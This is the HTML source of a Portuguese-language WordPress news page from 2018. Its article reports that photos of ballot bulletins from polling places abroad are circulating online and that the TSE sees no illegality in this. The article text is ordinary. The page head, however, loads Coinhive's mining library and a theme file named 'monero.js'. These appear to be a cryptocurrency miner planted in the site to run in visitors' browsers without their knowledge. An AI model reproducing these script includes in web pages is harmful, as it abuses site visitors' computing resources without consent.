

<!DOCTYPE html>
<html class="no-js" lang="pt-BR" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE - Oiguassu</title>

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

<!-- This site is optimized with the Yoast SEO plugin v7.9 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE - Oiguassu" />
<meta property="og:description" content="Imagens com extratos de votos em urnas já apuradas no exterior estão circulando nas redes sociais e aplicativos de mensagem neste domingo (7) Em locais..." />
<meta property="og:url" content="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/" />
<meta property="og:site_name" content="Oiguassu" />
<meta property="article:tag" content="manchete1" />
<meta property="article:section" content="Brasil" />
<meta property="article:published_time" content="2018-10-07T20:01:37+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300.jpg" />
<meta property="og:image:width" content="615" />
<meta property="og:image:height" content="300" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="Imagens com extratos de votos em urnas já apuradas no exterior estão circulando nas redes sociais e aplicativos de mensagem neste domingo (7) Em locais..." />
<meta name="twitter:title" content="BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE - Oiguassu" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300.jpg" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"http:\/\/oiguassu.com\/","sameAs":[],"@id":"http:\/\/oiguassu.com\/#organization","name":"Oiguassu","logo":""}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Oiguassu &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo; BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='dashicons-css'  href='http://oiguassu.com/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.3.2' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.8'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel='shortlink' href='https://wp.me/pS5BS-2U7' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fboletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fboletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/amp/"><link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
</head>
<body class="post-template-default single single-post postid-11167 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="Oiguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2018/05/cropped-b632f59c-2a6b-406a-bb6b-bd0031fe147b.jpg" height="427" width="1280" alt="Oiguassu" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/confira-os-deputados-estaduais-eleitos/" title="CONFIRA OS DEPUTADOS ESTADUAIS ELEITOS">
					<span class="ticker-item-date">outubro 7, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CONFIRA OS DEPUTADOS ESTADUAIS ELEITOS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/confira-os-deputados-federais-eleitos-para-a-camara-federal-pelo-parana/" title="CONFIRA OS DEPUTADOS FEDERAIS ELEITOS PARA A CÂMARA FEDERAL PELO PARANÁ">
					<span class="ticker-item-date">outubro 7, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CONFIRA OS DEPUTADOS FEDERAIS ELEITOS PARA A CÂMARA FEDERAL PELO PARANÁ</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/jair-bolsonaro-e-fernando-haddad-disputarao-a-presidencia-no-2o-turno/" title="JAIR BOLSONARO E FERNANDO HADDAD DISPUTARÃO A PRESIDÊNCIA NO 2º TURNO">
					<span class="ticker-item-date">outubro 7, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">JAIR BOLSONARO E FERNANDO HADDAD DISPUTARÃO A PRESIDÊNCIA NO 2º TURNO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/envolvido-em-escandalos-de-corrupcao-beto-richa-sofre-derrota-esmagadora-no-senado/" title="ENVOLVIDO EM ESCÂNDALOS DE CORRUPÇÃO, BETO RICHA SOFRE DERROTA ESMAGADORA NO SENADO">
					<span class="ticker-item-date">outubro 7, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">ENVOLVIDO EM ESCÂNDALOS DE CORRUPÇÃO, BETO RICHA SOFRE DERROTA ESMAGADORA NO SENADO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/" title="BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE">
					<span class="ticker-item-date">outubro 7, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/brasil/" itemprop="url"><span itemprop="title">Brasil</span></a></span></nav>
<article id="post-11167" class="post-11167 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/manchete1/" rel="tag">manchete1</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="615" height="300" src="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300.jpg 615w, http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300-300x146.jpg 300w" sizes="(max-width: 615px) 100vw, 615px" data-attachment-id="11168" data-permalink="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/boletim-de-urna-no-exterior-1538924596400_615x300/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300.jpg" data-orig-size="615,300" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="boletim-de-urna-no-exterior-1538924596400_615x300" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300-300x146.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/10/boletim-de-urna-no-exterior-1538924596400_615x300.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">outubro 7, 2018</span>
</p>
	<div class="entry-content clearfix">
		<h2 style="text-align: justify;">Imagens com extratos de votos em urnas já apuradas no exterior estão circulando nas redes sociais e aplicativos de mensagem neste domingo (7)</h2>
<p style="text-align: justify;">Em locais como Japão, segundo maior colégio eleitoral no exterior (atrás apenas dos EUA), as urnas se fecharam no início da manhã de hoje, devido à diferença de fuso horário.</p>
<p style="text-align: justify;">Brasileiros no país tiraram fotos de boletins que consolidam resultados de cada seção e consolidam, por conta própria, o número de votos registrados no país.</p>
<p style="text-align: justify;">O Tribunal Superior Eleitoral (TSE) diz que fotografar e divulgar imagens desses papéis não representa ilegalidade. Mas ressalta que a contagem paralela dos votos não tem validade, uma vez que não passa pela auditoria do órgão.</p>
<p style="text-align: justify;">Ainda segundo o TSE, após o encerramento da votação em cada seção eleitoral, seja no Brasil ou no exterior, o mesário responsável imprime o Boletim de Urna e afixa o extrato em um quadro de avisos, para que todos os eleitores e fiscais de partidos possam conhecer e auditar o resultado do pleito.</p>
<p style="text-align: justify;">Qualquer eleitor pode fotografar e divulgar o boletim, segundo o TSE, indicando que as imagens que circulam na internet são autênticas.</p>
<p style="text-align: justify;">Questionada em entrevista coletiva neste domingo (7), a presidente do TSE e ministra do STF (Supremo Tribunal Federal), Rosa Weber, respondeu que o Tribunal não está preocupado com a possibilidade de esses extratos influenciarem eleitores no Brasil.</p>
<p style="text-align: justify;">&#8220;Preocupação propriamente não. A nossa única preocupação é a realização das eleições com clima de tranquilidade, transparência, de modo com que qualquer eleitor possa exercer seu voto livremente e de acordo com suas convicções&#8221;, respondeu a ministra.</p>
<p style="text-align: justify;">Para checar se o extrato é verdadeiro, qualquer cidadão pode conferir os resultados apurados nas urnas por meio do aplicativo para celular &#8220;Boletim na Mão&#8221;.</p>
<p style="text-align: justify;">O APP da Justiça Eleitoral informa todo o conteúdo dos boletins. Basta escanear o código (QR Code) impresso no boletim e conferir se os dados coletados correspondem aos totalizados e divulgados pelo TSE. Porém, a consulta on-line ao espelho do boletim só pode ser feita no dia seguinte à votação, quando a totalização de todas as urnas, no Brasil e no exterior, for concluída.</p>
<p style="text-align: justify;">Os boletins contêm todas as informações relativas à votação em determinada seção, incluindo comparecimento de eleitores, contagem de votos brancos e nulos e o número de votos nominais e de votos de legenda.</p>
<p style="text-align: justify;">Ainda de acordo com o TSE, são impressos cinco vias do boletim. A primeira via é aquela publicada na porta da seção eleitoral. Outras vias ficam disponíveis para acesso dos fiscais dos partidos. Ao mesmo tempo, a versão eletrônica do boletim é enviada ao TSE por meio de uma rede virtual privada da Justiça Eleitoral.</p>
<p style="text-align: justify;">A apuração oficial dos resultados terá início a partir das 19 horas (pelo horário de Brasília) após o encerramento da votação no Acre, devido a diferença de duas horas no fuso horário.</p>
<h6 style="text-align: right;">(Com UOL)</h6>
<p><img class="aligncenter size-large" src="http://unifoz.edu.br/ProdutosIMG/5_1.jpg" width="800" height="756" /></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-11167" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/?share=twitter" rel="noopener noreferrer" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-11167" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/?share=facebook" rel="noopener noreferrer" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-11167" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/?share=google-plus-1" rel="noopener noreferrer" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-646 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/chuva-alaga-ruas-e-invade-casas-em-foz-do-iguacu/" title="Chuva alaga ruas e invade casas em Foz do Iguaçu"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/08/1-4-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/08/1-4-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-768x432.jpg 768w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-1024x576.jpg 1024w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/08/1-4-120x67.jpg 120w, http://oiguassu.com/wp-content/uploads/2017/08/1-4.jpg 1280w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="647" data-permalink="http://oiguassu.com/chuva-alaga-ruas-e-invade-casas-em-foz-do-iguacu/1-5/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/08/1-4.jpg" data-orig-size="1280,720" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/08/1-4-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/08/1-4-1024x576.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/chuva-alaga-ruas-e-invade-casas-em-foz-do-iguacu/" title="Chuva alaga ruas e invade casas em Foz do Iguaçu" rel="bookmark">
			Chuva alaga ruas e invade casas em Foz do Iguaçu		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-9755 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/lei-de-protecao-de-dados-trata-impactos-a-pessoas-empresas-e-governos/" title="LEI DE PROTEÇÃO DE DADOS TRATÁ IMPACTOS A PESSOAS, EMPRESAS E GOVERNOS"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="9756" data-permalink="http://oiguassu.com/lei-de-protecao-de-dados-trata-impactos-a-pessoas-empresas-e-governos/propostas-sobre-protecao-de-dados-pessoais-sao-debatidas-no-congresso/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185.jpg" data-orig-size="1140,760" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4&quot;,&quot;credit&quot;:&quot;Marcello Casal Jr\/Ag\u00eancia Brasil&quot;,&quot;camera&quot;:&quot;NIKON D3&quot;,&quot;caption&quot;:&quot;Propostas sobre prote\u00e7\u00e3o de dados pessoais s\u00e3o debatidas no Congresso&quot;,&quot;created_timestamp&quot;:&quot;1525858942&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;24&quot;,&quot;iso&quot;:&quot;800&quot;,&quot;shutter_speed&quot;:&quot;0.0025&quot;,&quot;title&quot;:&quot;Propostas sobre prote\u00e7\u00e3o de dados pessoais s\u00e3o debatidas no Congresso&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Propostas sobre proteção de dados pessoais são debatidas no Congresso" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/08/mca_abr0905182185-1024x683.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/lei-de-protecao-de-dados-trata-impactos-a-pessoas-empresas-e-governos/" title="LEI DE PROTEÇÃO DE DADOS TRATÁ IMPACTOS A PESSOAS, EMPRESAS E GOVERNOS" rel="bookmark">
			LEI DE PROTEÇÃO DE DADOS TRATÁ IMPACTOS A PESSOAS, EMPRESAS E GOVERNOS		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-9278 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/bolsonaro-anuncia-general-como-vice/" title="BOLSONARO ANUNCIA GENERAL COMO VICE"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-120x67.jpg 120w, http://oiguassu.com/wp-content/uploads/2018/08/41645169_303.jpg 700w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="9279" data-permalink="http://oiguassu.com/bolsonaro-anuncia-general-como-vice/41645169_303/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/08/41645169_303.jpg" data-orig-size="700,394" data-comments-opened="1" 